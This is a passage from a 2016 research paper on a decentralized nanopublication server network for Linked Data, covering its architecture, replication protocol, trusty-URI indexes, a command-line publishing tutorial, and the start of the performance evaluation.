downloading them is a matter of fractions of a second, and so that one has to process only a reasonable amount of data to decide which links to follow. We address the first requirement by proposing a distributed server network and the second one by building upon the concept of nanopublications. Below we explain the general architecture, the functioning and the interaction of the nanopublication servers, and the concept of nanopublication indexes. Architecture There are currently at least three possible architectures for Semantic Web applications (and mixtures thereof), as shown in a simplified manner in Fig. 1. The first option is the use of plain HTTP GET requests to dereference a URI. Applying the follow-your-nose principle, resolvable URIs provide the data based on which the application performs the tasks of finding relevant resources, running queries, analyzing and aggregating the results, and using them for the purpose of the application. This approach aligns very well with the principles and the architecture of the web, but the traversal-based querying it entails comes with limitations on efficiency and completeness (Hartig, 2013). If SPARQL endpoints are used, as a second option, most of the workload is shifted from the application to the server via the expressive power of the SPARQL query language. As explained above, this puts Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 7/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 servers at risk of being overloaded. With a third option such as Triple Pattern Fragments, servers provide only limited query features and clients perform the remainder of the query execution. This leads to reduced server costs, at the expense of longer query times. We can observe that all these current solutions are based on two-layer architectures, and have moreover no inherent replication mechanisms. A single point of failure can cause applications to be unable to complete their tasks: A single URI that does not resolve or a single server that does not respond can break the entire process. We argue here that we need distributed and decentralized services to allow for robust and reliable applications that consume Linked Data. In principle, this can be achieved for any of these two-layer architectures by simply setting up several identical servers that mirror the same content, but there is no standardized and generally accepted way of how to communicate these mirror servers and how to decide on the client side whether a supposed mirror server is trustworthy. Even putting aside these difficulties, two-layer architectures have further conceptual limitations. The most low-level task of providing Linked Data is essential for all other tasks at higher levels, and therefore needs to be the most stable and robust one. We argue that this can be best achieved if we free this lowest layer from all tasks except the provision and archiving of data entries (nanopublications in our case) and decouple it from the tasks of providing services for finding, querying, or analyzing the data. This makes us advocate a multi-layer architecture, a possible realization of which is shown at the bottom of Fig. 1. Below we present a concrete proposal of such a low-level data provision infrastructure in the form of a nanopublication server network. Based on such an infrastructure, one can then build different kinds of services operating on a subset of the nanopublications they find in the underlying network. ‘‘Core services’’ could involve things like resolving backwards references (i.e., ‘‘which nanopublications refer to the given one?’’) and the retrieval of the nanopublications published by a given person or containing a particular URI. Based on such core services for finding nanopublications, one could then provide ‘‘advanced services’’ that allow us to run queries on subsets of the data and ask for aggregated output. These higher layers can of course make use of existing techniques such as SPARQL endpoints and Triple Pattern Fragments or even classical relational databases, and they can cache large portions of the data from the layers below (as nanopublications are immutable, they are easy to cache). For example, an advanced service could allow users to query the latest versions of several drug-related datasets, by keeping a local triple store and providing users with a SPARQL interface. Such a service would regularly check for new data in the server network on the given topic, and replace outdated nanopublications in its triple store with new ones. A query request to this service, however, would not involve an immediate query to the underlying server network, in the same way that a query to the Google search engine does not trigger a new crawl of the web. While the lowest layer would necessarily be accessible to everybody, some of the services on the higher level could be private or limited to a small (possibly paying) user group. We have in particular scientific data in mind, but we think that an architecture of this kind could also be used for Semantic Web content in general. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 8/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 2 Schematic representation of the decentralized server architecture. Nanopublications that have trusty URI identifiers can be uploaded to a server (or loaded from the local file system by the server ad- ministrator), and they are then distributed to the other servers of the network. They can then be retrieved from any of the servers, or from multiple servers simultaneously, even if the original server is not accessi- ble. Nanopublication servers As a concrete proposal of a low-level data provision layer, as explained above, we present here a decentralized nanopublication server network with a REST API to provide and distribute nanopublications. To ensure the immutability of these nanopublications and to guarantee the reliability of the system, these nanopublications are required to come with trusty URI identifiers, i.e., they have to be transformed on the client side into such trusty nanopublications before they can be published to the network. The nanopublication servers of such a network connect to each other to retrieve and (partly) replicate their nanopublications, and they allow users to upload new nanopublications, which are then automatically distributed through the network. Figure 2 shows a schematic depiction of this server network. Basing the content of this network on nanopublications with trusty URIs has a number of positive consequences for its design: The first benefit is that the fact that nanopublications are always small (by definition) makes it easy to estimate how much time is needed to process an entity (such as validating its hash) and how much space to store it (e.g., as a serialized RDF string in a database). Moreover it ensures that these processing times remain mostly in the fraction-of-a-second range, guaranteeing that responses are always quick, and that these entities are never too large to be analyzed in memory. The second benefit is that servers do not have to deal with identifier management, as the nanopublications already come with trusty URIs, which are guaranteed to be unique and universal. The third and possibly most important benefit is that nanopublications with trusty URIs are immutable and verifiable. This means that servers only have to deal with adding new entries but not with updating them, which eliminates the hard problems of concurrency control and data integrity in distributed systems. (As with classical publications, a nanopublication—once published to the network—cannot be deleted or ‘‘unpublished,’’ but only marked retracted or superseded by the publication of a new nanopublication.) Together, these aspects significantly simplify the design of such a network and its synchronization protocol, and make it reliable and efficient even with limited resources. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 9/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Specifically, a nanopublication server of the current network has the following components: • A key-value store of its nanopublications (with the artifact code from the trusty URI as the key) • A long list of all stored nanopublications, in the order they were loaded at the given server. We call this list the server’s journal, and it consists of a journal identifier and the sequence of nanopublication identifiers, subdivided into pages of a fixed size. (1,000 elements is the default: page 1 containing the first 1,000 nanopublications; page 2 the next 1,000, etc.) • A cache of gzipped packages containing all nanopublications for a given journal page • Pattern definitions in the form of a URI pattern and a hash pattern, which define the surface features of the nanopublications stored on the given server • A list of known peers, i.e., the URLs of other nanopublication servers • Information about each known peer, including the journal identifier and the total number of nanopublications at the time it was last visited. The server network can be seen as an unstructured peer-to-peer network, where each node can freely decide which other nodes to connect to and which nanopublications to replicate. The URI pattern and the hash pattern of a server define the surface features of the nanopublications that this server cares about. We called them surface features, because they can be determined by only looking at the URI of a nanopublication. For example, the URI pattern ‘ http://rdf.disgenet.org/’ states that the given server is only interested in nanopublications whose URIs start with the given sequence of characters. Additionally, a server can declare a hash pattern like ‘ AA AB’ to state that it is only interested in nanopublications whose hash in the trusty URI start with one of the specified character sequences (separated by blank spaces). As hashes are represented in Base64 notation, this particular hash pattern would let a server replicate about 0.05% of all nanopublications. Nanopublication servers are thereby given the opportunity to declare which subset of nanopublications they replicate, and need to connect only to those other servers whose subsets overlap. To decide on whether a nanopublication belongs to a specified subset or not, the server only has to apply string matching at two given starting points of the nanopublication URI (i.e., the first position and position 43 from the end—as the hashes of the current version of trusty URIs are 43 bytes long), which is computationally cheap. Based on the components introduced above, the servers respond to the following request (in the form of HTTP GET): • Each server needs to return general server information, including the journal identifier and the number of stored nanopublications, the server’s URI pattern and hash pattern, whether the server accepts POST requests for new nanopublications or servers (see below), and informative entries such as the name and email address of the maintainer and a general description. Additionally, some server-specific limits can be specified: the maximum number of triples per nanopublication (the default is 1,200), the Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 10/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 1Source code repository: https://github. com/tkuhn/nanopub-server. maximum size of a nanopublication (the default is 1 MB), and the maximum number of nanopublications to be stored on the given server (unlimited by default). • Given an artifact code (i.e., the final part of a trusty URI) of a nanopublication that is stored by the server, it returns the given nanopublication in a format like TriG, TriX, N-Quads, or JSON-LD (depending on content negotiation). • A journal page can be requested by page number as a list of trusty URIs. • For every journal page (except for incomplete last pages), a gzipped package can be requested containing the respective nanopublications. • The list of known peers can be requested as a list of URLs. In addition, a server can optionally support the following two actions (in the form of HTTP POST requests): • A server may accept requests to add a given individual nanopublication to its database. • A server may also accept requests to add the URL of a new nanopublication server to its peer list. Server administrators have the additional possibility to load nanopublications from the local file system, which can be used to publish large amounts of nanopublications, for which individual POST requests are not feasible. Together, the server components and their possible interactions outlined above allow for efficient decentralized distribution of published nanopublications. Specifically, current nanopublication servers follow the following procedure.1 Every server s keeps its own list of known peer Ps. For each peer p on that list that has previously been visited, the server additionally keeps the number of nanopublications on that peer server n′p and its journal identifier j′p, as recorded during the last visit. At a regular interval, every peer server p on the list of known peers is visited by server s: 1. The latest server information is retrieved from p, which includes its list of known peers Pp, the number of stored nanopublications np, the journal identifier jp, the server’s URI pattern Up, and its hash pattern Hp. 2. All entries in Pp that are not yet on the visiting server’s own list of known peers Ps are added to Ps. 3. If the visiting server’s URL is not in Pp, the visiting server s makes itself known to server p with a POST request (if this is supported by p). 4. If the subset defined by the server’s own URI/hash patterns Us and Hs does not overlap with the subset defined by Up and Hp, then there won’t be any nanopublications on the peer server that this server is interested in, and we jump to step 9. 5. The server will start at position n to look for new nanopublications at server p: n is set to the total number of nanopublications of the last visit n′p, or to 0 if there was no last visit (nanopublication counting starts at 0). 6. If the retrieved journal identifier jp is different from j′p (meaning that the server has been reset since the last visit), n is set to 0. 7. If n=np, meaning that there are no new nanopublications since the last visit, the server jumps to step 9. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 11/29 https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-server https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 8. All journal pages p starting from the one containing n until the end of the journal are downloaded one by one (considering the size of journal pages, which is by default 1,000 nanopublications): (a) All nanopublication identifiers in p (excluding those before n) are checked with respect to whether (A) they are covered by the visiting server’s patterns Us and Hs and (B) they are not already contained in the local store. A list l is created of all nanopublication identifiers of the given page that satisfy both, (A) and (B). (b) If the number of new nanopublications |l|exceeds a certain threshold (currently set to five), the nanopublications of p are downloaded as a gzipped package. Otherwise, the new nanopublications (if any) are requested individually. (c) The retrieved nanopublications that are in list l are validated using their trusty URIs, and all valid nanopublications are loaded to the server’s nanopublication store and their identifiers are added to the end of the server’s own journal. (Invalid nanopublications are ignored.) 9. The journal identifier jp and the total number of nanopublications np for server p are remembered for the next visit, replacing the values of j′p and n ′ p. The current implementation is designed to be run on normal web servers alongside with other applications, with economic use of the server’s resources in terms of memory and processing time. In order to avoid overload of the server or the network connection, we restrict outgoing connections to other servers to one at a time. Of course, sufficient storage space is needed to save the nanopublications (for which we currently use MongoDB), but storage space is typically much easier and cheaper to scale up than memory or processing capacities. The current system and its protocol are not set in stone but, if successful, will have to evolve in the future—in particular with respect to network topology and partial replication—to accommodate a network of possibly thousands of servers and billions of nanopublications. Nanopublication indexes To make the infrastructure described above practically useful, we have to introduce the concept of indexes. One of the core ideas behind nanopublications is that each of them is a tiny atomic piece of data. This implies that analyses will mostly involve more than just one nanopublication and typically a large number of them. Similarly, most processes will generate more than just one nanopublication, possibly thousands or even millions of them. Therefore, we need to be able to group nanopublications and to identify and use large collections of them. Given the versatility of the nanopublication standard, it seems straightforward to represent such collections as nanopublications themselves. However, if we let such ‘‘col- lection nanopublications’’ contain other nanopublications, then the former would become very large for large collections and would quickly lose their property of being nano. We can solve part of that problem by applying a principle that we can call reference instead of containment: nanopublications cannot contain but only refer to other nanopublications, and trusty URIs allow us to make these reference links almost as strong as containment links. To emphasize this principle, we call them indexes and not collections. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 12/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 3 Schematic example of nanopublication indexes, which are themselves nanopublications. Nanopublications can (but need not) be elements of one or more indexes. An index can have sub-indexes and can append to another index, in either case acquiring all nanopublications. However, even by only containing references and not the complete nanopublications, these indexes can still become quite large. To ensure that all such index nanopublications remain nano in size, we need to put some limit on the number of references, and to support sets of arbitrary size, we can allow indexes to be appended by other indexes. We set 1,000 nanopublication references as the upper limit any single index can directly contain. This limit is admittedly arbitrary, but it seems to be a reasonable compromise between ensuring that nanopublications remain small on the one hand and limiting the number of nanopublications needed to define large indexes on the other. A set of 100,000 nanopublications, for example, can therefore be defined by a sequence of 100 indexes, where the first one stands for the first 1,000 nanopublications, the second one appends to the first and adds another 1,000 nanopublications (thereby representing 2,000 of them), and so on up to the last index, which appends to the second to last and thereby stands for the entire set. In addition, to allow datasets to be organized in hierarchies, we define that the references of an index can also point to sub-indexes. In this way we end up with three types of relations: an index can append to another index, it can contain other indexes as sub-indexes, and it can contain nanopublications as elements. These relations defining the structure of nanopublication indexes are shown schematically in Fig. 3. Index (a) in the shown example contains five nanopublications, three of them via sub-index (c). The latter is also part of index (b), which additionally contains eight nanopublications via sub-index (f). Two of these eight nanopublications belong directly to (f), whereas the remaining six come from appending to index (e). Index (e) in turn gets half of its nanopublications by appending to index (d). We see that some nanopublications may not be referenced by any index at all, while others may belong to several indexes at the same time. The maximum number of direct nanopublications (or sub-indexes) is here set to three for illustration purposes, whereas in reality this limit is set to 1,000. In addition to describing sets of data entries, nanopublication indexes can also have additional metadata attached, such as labels, descriptions, further references, and other types of relations at the level of an entire dataset. Below we show how this general concept of Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 13/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 indexes can be used to define sets of new or existing nanopublications, and how such index nanopublications can be generated and published, and their nanopublications retrieved. As a side note, dataset metadata can be captured and announced as nanopublications even for datasets that are not (yet) themselves available in the nanopublication format. The HCLS Community Profile of dataset descriptions (Gray et al., 2015) provides a good guideline of which of the existing RDF vocabularies to use for such metadata descriptions. Trusty publishing Let us consider two simple exemplary scenarios to illustrate and motivate the general concepts. To demonstrate the procedure and the general interface of our implementation, we show here the individual steps on the command line in a tutorial-like fashion, using the np command from the nanopub-java library (Kuhn, 2015a). Of course, users should eventually be supported by graphical interfaces, but command line tools are a good starting point for developers to build such tools. To make this example completely reproducible, these are the commands to download and compile the needed code from a Bash shell (requiring Git and Maven): $ git clone https://github.com/Nanopublication/nanopub-java.git $ cd nanopub-java $ mvn package And for convenience reasons, we can add the bin directory to the path variable: $ PATH=$(pwd)/bin:$PATH To publish some new data, they have to be formatted as nanopublications. We use the TriG format here and define the following RDF prefixes: @prefix : <http://example.org/np1#>. @prefix xsd: <http://www.w3.org/2001/XMLSchema#>. @prefix dc: <http://purl.org/dc/terms/>. @prefix pav: <http://purl.org/pav/>. @prefix prov: <http://www.w3.org/ns/prov#>. @prefix np: <http://www.nanopub.org/nschema#>. @prefix ex: <http://example.org/>. A nanopublication consists of three graphs plus the head graph. The latter defines the structure of the nanopublication by linking to the other graphs: :Head { : a np:Nanopublication; np:hasAssertion :assertion; np:hasProvenance :provenance; np:hasPublicationInfo :pubinfo. } The actual claim or hypothesis of the nanopublication goes into the assertion graph: :assertion { ex:mosquito ex:transmits ex:malaria. } The provenance and publication info graph provide meta-information about the assertion and the entire nanopublication, respectively: Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 14/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 :provenance { :assertion prov:wasDerivedFrom ex:mypublication. } :pubinfo { : pav:createdBy <http://orcid.org/0000-0002-1267-0234>. : dc:created "2014-07-09T13:54:11+01:00"^^xsd:dateTime. } The lines above constitute a very simple but complete nanopublication. To make this example a bit more interesting, let us define two more nanopublications that have different assertions but are otherwise identical: @prefix : <http://example.org/np2#>. ... ex:Gene1 ex:isRelatedTo ex:malaria. ... @prefix : <http://example.org/np3#>. ... ex:Gene2 ex:isRelatedTo ex:malaria. ... We save these nanopublications in a file nanopubs.trig, and before we can publish them, we have to assign them trusty URIs: $ np mktrusty -v nanopubs.trig Nanopub URI: http://example.org/np1#RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I Nanopub URI: http://example.org/np2#RAT5swlSLyMbuD03KzJsYHVV2oM1wRhluRxMrvpkZCDUQ Nanopub URI: http://example.org/np3#RAkvUpysi9Ql3itlc6-iIJMG7YSt3-PI8dAJXcmafU71s This gives us the file trusty.nanopubs.trig, which contains transformed versions of the three nanopublications that now have trusty URIs as identifiers, as shown by the output lines above. Looking into the file we can verify that nothing has changed with respect to the content, and now we are ready to publish them: $ np publish trusty.nanopubs.trig 3 nanopubs published at http://np.inn.ac/ For each of these nanopublications, we can check their publication status with the following command (referring to the nanopublication by its URI or just its artifact code): $ np status -a RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I URL: http://np.inn.ac/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I Found on 1 nanopub server. This is what you see immediately after publication. Only one server knows about the new nanopublication. Some minutes later, however, the same command leads to something like this: $ np status -a RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I URL: http://np.inn.ac/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I URL: http://ristretto.med.yale.edu:8080/nanopub-server/RAQoZlp22LHIvtYqHCosPbU... URL: http://nanopubs.stanford.edu/nanopub-server/RAQoZlp22LHIvtYqHCosPbUtX8yeG... URL: http://nanopubs.semanticscience.org:8082/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y... URL: http://rdf.disgenet.org/nanopub-server/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5A... URL: http://app.tkuhn.eculture.labs.vu.nl/nanopub-server-2/RAQoZlp22LHIvtYqHCo... URL: http://nanopubs.restdesc.org/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I URL: http://nanopub.backend1.scify.org/nanopub-server/RAQoZlp22LHIvtYqHCosPbUt... URL: http://nanopub.exynize.com/RAQoZlp22LHIvtYqHCosPbUtX8yeGs1Y5AfqcjMneLQ2I Found on 9 nanopub servers. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 15/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Next, we can make an index pointing to these three nanopublications: $ np mkindex -o index.nanopubs.trig trusty.nanopubs.trig Index URI: http://np.inn.ac/RAXsXUhY8iDbfDdY6sm64hRFPr7eAwYXRlSsqQAz1LE14 This creates a local file index.nanopubs.trig containing the index, identified by the URI shown above. As this index is itself a nanopublication, we can publish it in the same way: $ np publish index.nanopubs.trig 1 nanopub published at http://np.inn.ac/ Once published, we can check the status of this index and its contained nanopublications: $ np status -r RAXsXUhY8iDbfDdY6sm64hRFPr7eAwYXRlSsqQAz1LE14 1 index nanopub; 3 content nanopubs Again, after just a few minutes this nanopublication will be distributed in the network and available on multiple servers. From this point on, everybody can conveniently and reliably retrieve the given set of nanopublications. The only thing one needs to know is the artifact code of the trusty URI of the index: $ np get -c RAXsXUhY8iDbfDdY6sm64hRFPr7eAwYXRlSsqQAz1LE14 This command downloads the nanopublications of the index we just created and published. As another exemplary scenario, let us imagine a researcher in the biomedical domain who is interested in the protein CDKN2A and who has derived some conclusion based on the data found in existing nanopublications. Specifically, let us suppose this researcher analyzed the five nanopublications specified by the following artifact codes (they can be viewed online by appending the artifact code to the URL http://np.inn.ac/ or the URL of any other nanopublication server): RAEoxLTy4pEJYbZwA9FuBJ6ogSquJobFitoFMbUmkBJh0 RAoMW0xMemwKEjCNWLFt8CgRmg_TGjfVSsh15hGfEmcz4 RA3BH_GncwEK_UXFGTvHcMVZ1hW775eupAccDdho5Tiow RA3HvJ69nO0mD5d4m4u-Oc4bpXlxIWYN6L3wvB9jntTXk RASx-fnzWJzluqRDe6GVMWFEyWLok8S6nTNkyElwapwno These nanopublications about the same protein come from two different sources: The first one is from the BEL2nanopub dataset, whereas the remaining four are from neXtProt. (See https://github.com/tkuhn/bel2nanopub and http://nextprot2rdf.sourceforge.net, respectively, and Table 1.) These nanopublications can be downloaded as above with the np get command and stored in a file, which we name here cdkn2a-nanopubs.trig. In order to be able to refer to such a collection of nanopublications with a single identifier, a new index is needed that contains just these five nanopublications. This time we give the index a title (which is optional). $ np mkindex -t "Data about CDKN2A from BEL2nanopub & neXtProt" \ -o index.cdkn2a-nanopubs.trig cdkn2a-nanopubs.trig Index URI: http://np.inn.ac/RA6jrrPL2NxxFWlo6HFWas1ufp0OdZzS_XKwQDXpJg3CY The generated index is stored in the file index.cdkn2a-nanopubs.trig, and our exemplary researcher can now publish this index to let others know about it: $ np publish index.cdkn2a-nanopubs.trig 1 nanopub published at http://np.inn.ac/ Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 16/29 https://peerj.com https://github.com/tkuhn/bel2nanopub http://nextprot2rdf.sourceforge.net http://dx.doi.org/10.7717/peerj-cs.78 Table 1 Existing datasets in the nanopublication format, five of which were used for the first part of the evaluation. Dataset # nanopublications # triples Used for evaluation part Name and citation Index Content Index Content GeneRIF/AIDA 157 156,026 157,909 2,340,390 First (NP Index RAY_lQruua, 2015) OpenBEL 1.0 53 50,707 51,448 1,502,574 First (NP Index RACy0I4f_w, 2015) OpenBEL 20131211 76 74,173 75,236 2,186,874 First (NP Index RAR5dwELYL, 2015) DisGeNET v2.1.0.0 941 940,034 951,325 31,961,156 First (NP Index RAXy332hxq, 2015) DisGeNET v3.0.0.0 1,019 1,018,735 1,030,962 34,636,990 None (NP Index RAVEKRW0m6, 2015) neXtProt 4,026 4,025,981 4,078,318 156,263,513 First (NP Index RAXFlG04YM, 2015) LIDDI 99 98,085 99,272 2,051,959 Third (NP Index RA7SuQ0e66, 2015) Total 6,371 6,363,741 6,444,470 230,943,456 There is no need to publish the five nanopublications this index is referring to, because they are already public (this is how we got them in the first place). The index URI can now be used to refer to this new collection of existing nanopublications in an unambiguous and reliable manner. This URI can be included in the scientific publication that explains the new finding, for example with a reference like the following: [1] Data about CDKN2A from BEL2nanopub & neXtProt. Nanopublication index http://np.inn.ac/RA6jrrPL2NxxFWlo6HFWas1ufp0OdZzS_XKwQDXpJg3CY, 14 April 2015. In this case with just five nanopublications, one might as well refer to them individually, but this is obviously not an option for cases where we have hundreds or thousands of them. The given web link allows everybody to retrieve the respective nanopublications via the server np.inn.ac. The URL will not resolve should the server be temporarily or permanently down, but because it is a trusty URI we can retrieve the nanopublications from any other server of the network following a well-defined protocol (basically just extracting the artifact code, i.e., the last 45 characters, and appending it to the URL of another nanopublication server). This reference is therefore much more reliable and more robust than links to other types of data repositories. In fact, we refer to the datasets we use in this publication for evaluation purposes, as described below in ‘Evaluation’, in exactly this way (NP Index RAY_lQruua, 2015; NP Index RACy0I4f_w, 2015; NP Index RAR5dwELYL, 2015; NP Index RAXy332hxq, 2015; NP Index RAVEKRW0m6, 2015; NP Index RAXFlG04YM, 2015; NP Index RA7SuQ0e66, 2015). Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 17/29 https://peerj.com http://np.inn.ac/RA6jrrPL2NxxFWlo6HFWas1ufp0OdZzS_XKwQDXpJg3CY http://dx.doi.org/10.7717/peerj-cs.78 Figure 4 The web interface of the nanopublication validator can load nanopublications by their trusty URI (or just their artifact code) from the nanopublication server network. It also allows users to directly publish uploaded nanopublications. The new finding that was deduced from the given five nanopublications can, of course, also be published as a nanopublication, with a reference to the given index URI in the provenance part: @prefix : <http://example.org/myfinding#>. ... @prefix nps: <http://np.inn.ac/>. @prefix uniprot: <http://purl.uniprot.org/uniprot/>. ... :assertion { uniprot:P42771 a ex:proteinWithPropertyX. } :provenance { :assertion prov:wasInfluencedBy nps:RA6jrrPL2NxxFWlo6HFWas1ufp0OdZzS_XKwQDXpJg3CY. } :pubinfo { : pav:createdBy <http://orcid.org/0000-0002-1267-0234>. : dc:created "2015-04-14T08:05:43+01:00"^^xsd:dateTime. } We can again transform it to a trusty nanopublication , and then publish it as above. Some of the features of the presented command-line interface are made available through a web interface for dealing with nanopublications that is shown in Fig. 4. The supported features include the generation of trusty URIs, as well as the publication and retrieval of nanopublications. The interface allows us to retrieve, for example, the nanopublication we just generated and published above, even though we used an example.org URI, which is not directly resolvable. Unless it is just about toy examples, we should of course try to use Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 18/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 5 This screenshot of the nanopublication monitor interface (http://npmonitor.inn.ac ) showing the current server network. It currently consists of 15 server instances on 10 physical servers in Zurich, New Haven, Ottawa, Amsterdam, Stanford, Barcelona, Ghent, Athens, Leipzig, and Haverford. resolvable URIs, but with our decentralized network we can retrieve the data even if the original link is no longer functioning or temporarily broken. EVALUATION To evaluate our approach, we want to find out whether a small server network run on normal web servers, without dedicated infrastructure, is able to handle the amount of nanopublications we can expect to become publicly available in the next few years. Our evaluation consists of three parts focusing on the different aspects of dataset publication, server performance, and dataset retrieval, respectively. At the time the first part of the evaluation was performed, the server network consisted of three servers in Zurich, New Haven, and Ottawa. Seven new sites in Amsterdam, Stanford, Barcelona, Ghent, Athens, Leipzig, and Haverford have joined the network since. The current network of 15 server instances on 10 sites (in 8 countries) is shown in Fig. 5, which is a screenshot of a nanopublication monitor that we have implemented (https://github.com/tkuhn/nanopub- monitor). Such monitors regularly check the nanopublication server network, register changes (currently once per minute), and test the response times and the correct operation of the servers by requesting a random nanopublication and verifying the returned data. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 19/29 https://peerj.com http://npmonitor.inn.ac https://github.com/tkuhn/nanopub-monitor https://github.com/tkuhn/nanopub-monitor http://dx.doi.org/10.7717/peerj-cs.78 The files of the presented studies are available online in two repositories, one for the analyses of the original studies that have been previously published (https://bitbucket.org/ tkuhn/trustypublishing-study/) and another one with the files for the additional analyses and diagrams for this extended article (https://bitbucket.org/tkuhn/trustypublishingx- study/). Evaluation design Table 1 shows seven existing large nanopublication datasets. Five of these datasets were used for the first part of the evaluation (the other two were not yet available at the time this part of the evaluation was conducted), which tested the ability of the network to store and distribute new datasets. These five datasets consist of a total of more than 5 million nanopublications and close to 200 million RDF triples, including nanopublication indexes that we generated for each dataset. The total size of these five datasets when stored as uncompressed TriG files amounts to 15.6 GB. Each of the datasets is assigned to one of the three servers, where it is loaded from the local file systems. The first nanopublications start spreading to the other servers, while others are still being loaded from the file system. We therefore test the reliability and capacity of the network under constant streams of new nanopublications coming from different servers, and we use two nanopublication monitors (in Zurich and Ottawa) to evaluate the responsiveness of the network. In the second part of the evaluation we expose a server to heavy load from clients to test its retrieval capacity. For this we use a service called Load Impact (https://loadimpact.com) to let up to 100 clients access a nanopublication server in parallel. We test the server in Zurich over a time of five minutes under the load from a linearly increasing number of clients (from 0 to 100) located in Dublin. These clients are programmed to request a randomly chosen journal page, then to go though the entries of that page one by one, requesting the respective nanopublication with a probability of 10%, and starting over again with a different page. As a comparison, we run a second session, for which we load the same data into a Virtuoso SPARQL endpoint on the same server in Zurich (with 16 GB of memory given to Virtuoso and two 2.40 GHz Intel Xeon processors). Then, we perform exactly the same stress test on the SPARQL endpoint, requesting the nanopublications in the form of SPARQL queries instead of requests to the nanopublication server interface. This comparison is admittedly not a fair one, as SPARQL endpoints are much more powerful and are not tailor-made for the retrieval of nanopublications, but they provide nevertheless a valuable and well-established reference point to evaluate the performance of our system. While the second part of the evaluation focuses on the server perspective, the third part considers the client side. In this last part, we want to test whether the retrieval of an entire dataset in a parallel fashion from the different servers of the network is indeed efficient and reliable. We decided to use a medium-sized dataset and chose LIDDI (NP Index RA7SuQ0e66, 2015), which consists of around 100,000 triples. We tested the retrieval of this dataset from a computer connected to the internet via a basic plan from a regular internet service provider (i.e., not via a fast university network) with a command like the following: $ np get -c -o nanopubs.trig RA7SuQ0e661LJdKpt5EOS2DKykf1ht9LFmNaZtFSDMrXg Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 20/29 https://peerj.com https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://loadimpact.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 6 This diagram shows the rate at which nanopublications are loaded at their first, second, and third server, respectively, over the time of the evaluation. At the first server, nanopublications are loaded from the local file system, whereas at the second and third server they are retrieved via the server network. In addition, we wanted to test the retrieval in a situation where the internet connection and/or the nanopublication servers are highly unreliable. For that, we implemented a version of an input stream that introduces errors to simulate such unreliable connections or servers. With a given probability (set to 1% for this evaluation), each read attempt to the input stream (a single read attempt typically asking for about 8000 bytes) either leads to a randomly changed byte or to an exception being thrown after a delay of 5 s (both having an equal chance of occurring of 0.5%). This behavior can be achieved with the following command, which is obviously only useful for testing purposes: $ np get -c -o nanopubs.trig --simulate-unreliable-connection \ RA7SuQ0e661LJdKpt5EOS2DKykf1ht9LFmNaZtFSDMrXg For the present study, we run each of these two commands 20 times. To evaluate the result, we can investigate whether the downloaded sets of nanopublications are equivalent, i.e., lead to identical files when normalized (such as transformed to a sorted N-Quads representation). Furthermore, we can look into the amount of time this retrieval operation takes, and the number of times the retrieval of a single nanopublication from a server fails and has to be repeated. Evaluation results The first part of the evaluation lasted 13 h and 21 min, at which point all nanopublications were replicated on all three servers, and therefore the nanopublication traffic came to an end. Figure 6 shows the rate at which the nanopublications were loaded at their first, second, and third server, respectively. The network was able to handle an average of about 400,000 new nanopublications per hour, which corresponds to more than 100 new nanopublications per second. This includes the time needed for loading each nanopublication once from the local file system (at the first server), transferring it through the network two times (to the other two servers), and for verifying it three times (once when loaded and twice when received by the other two servers). Figure 7 shows the response times of the three servers as measured by the two nanopublication monitors in Zurich (top) and Ottawa (bottom) Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 21/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 Figure 7 Server response times under heavy load, recorded by the monitors during the first evalua- tion. time from start of test in seconds re sp o n se t im e in s e co n d s 0 50 100 150 200 250 3000 50 100 150 200 250 300 0.1 1 10 100 0 20 40 60 80 100 number of clients accessing the service in parallel Virtuoso triple store with SPARQL endpoint nanopublication server Figure 8 Results of the evaluation of the retrieval capacity of a nanopublication server as compared to a general SPARQL endpoint (note the logarithmic y-axis). during the time of the evaluation. We see that the observed latency is mostly due to the geographical distance between the servers and the monitors. The response time was always less than 0.21 s when the server was on the same continent as the measuring monitor. In 99.77% of all cases (including those across continents) the 